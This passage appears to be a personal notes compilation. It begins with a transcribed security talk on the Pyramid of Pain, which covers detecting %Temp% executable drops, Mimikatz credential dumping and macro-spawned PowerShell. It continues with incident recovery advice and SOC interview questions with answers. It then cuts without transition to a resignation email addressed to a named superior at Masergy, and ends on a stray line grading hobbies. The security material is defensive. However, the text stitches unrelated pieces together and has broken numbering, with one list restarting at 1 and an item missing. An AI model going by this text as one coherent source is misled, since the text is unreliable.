give me a new public IP address, and then I can get into your network again.
How about domain names? Sometimes adversaries don't really care about domain names;
they can simply register some weird domain name with a TLD of .win, .vip, .tk or
.kim for free and use it as a C2 channel. That's very simple for them.
How about network/host artifacts? Let's say, as a good defender, you have a
detection strategy that for every executable file dropped in the %Temp% folder,
give me an alert. That's going to be annoying to me, because in almost all of my
attack methodology I'm used to doing that.
And if you also have a good detection strategy for tools like Mimikatz for
credential dumping, or Cobalt Strike if there's a pipe in the event and network
logs, oh, that's going to be challenging to me.
And now the top of the pyramid: the TTPs. It's already 2021 and, you know, we are
not just focusing on detecting external attacks like port scanning and other
related attempts against our external network; we are also focusing now on the
behavioral kind of things. It's not just about hashes, IP addresses, domain names
and other IOCs; we are also detecting based on the behavior of a certain attack.
For example, phishing. The common behavior of this technique is sending an email,
and when the target receives it, there will be a certain link or attachment that has
an Excel file asking the user to enable macros, and once they are enabled it will
spawn cmd or PowerShell in the background. The behavior, the logic behind this
technique, is the parent and child relationship wherein the file is spawning cmd or
PowerShell; that's the TTP. There are 14 tactics, 185 techniques and I think 367
sub-techniques, you know; there's a lot to digest there.
Recovery Procedure
Some sort of rebuilding the server, or maybe rebuilding the image of the infected
machine using a verified backup, so we can restore all the activities and software.
The thing that I can see from the SOC standpoint is that they always put the server
back into production without asking the business owner. So, for example, you
contained a specific server and there's no approval from the business owner; you
have to ask them whether the applications are running. Maybe they are running an SAP
system, maybe they are running some ERP system, and suddenly you rebuild this server
and put it back into production, and then it's not working on their end; then we are
dealing with some loss of confidence in our security team. My suggestion: create a
template wherein you can ask the business owner before you put the server back into
production, and test the system to confirm all the applications are really working
before we can close the ticket, before we can say okay, we are done with the
recovery stage.
1. What are the tools that you can use to get static information of a certain PE?
CFF Explorer, PE Studio, CAPA, Sysinternals Suite.
2. How would you analyze a packet capture? Do you use any tools for such?
Wireshark, BruteShark, TShark, tcpdump, NetworkMiner, Moloch or Arkime.
1. In a Windows system, what is the location or directory where event logs are
stored?
The typical location, if we are running Windows Vista and above like Windows 8,
Windows 10 and Windows 11, is the C:\Windows\System32\winevt folder; that's where
event logs are stored by the operating system. Now, let's say you are running
Windows XP; where is the location? That would be the C:\Windows\System32\config
folder, and there you can see the event logs along with the registry hives.
2. Phase in the Cyber Kill Chain where the adversary performs enumeration of
employees, services, etc.?
Reconnaissance.
3. Stage of Incident Response where the full clean-up and removal of the cause of
the incident occurs?
Eradication.
4. During the incident, immediately shut down the infected system and disconnect it
from the network? True or False?
False. If we shut down our machine there is a very minimal chance that we can
recover the volatile data. We should get the memory dump first so we can investigate
it properly.
6. This is the type of analysis that focuses on the least frequent occurrence. It
allows analysis of a large amount of data without drowning. Long Tail Analysis
7. How do you stay up to date with the latest infosec developments related to IR?
Twitter; TweetDeck contains a lot of feeds related to vulnerability assessment,
threat intelligence, malware analysis, digital forensics, cyber defense, threat
hunting, penetration testing, a lot. The DFIR Report, Krebs on Security, Hacker
News, SANS.edu
Hi Sir Joelle,
As I compose this email, every strike on the keys feels like a stab in my heart.
This is one of the toughest and most saddening decisions I have ever had to make.
I am resigning from my post as a Tier 3 Network Security Analyst of the most
hardworking team I ever had the opportunity of being a part of... the MSOC.
It is nothing more than a career move. Everything else here in Masergy is superb.
I couldn't have asked for more supportive and/or trusting superiors than yourself.
We couldn't have picked a more perfect mix of individuals here in MSOC. The synergy
amongst all of them is always visible.
Sometimes Pass (1.00) Most of the Time Fail (0.00) - Cutting Classes, Coin
Flipping, Billiards, Dota, Mixed Martial Arts, Food Trip, Social Drinking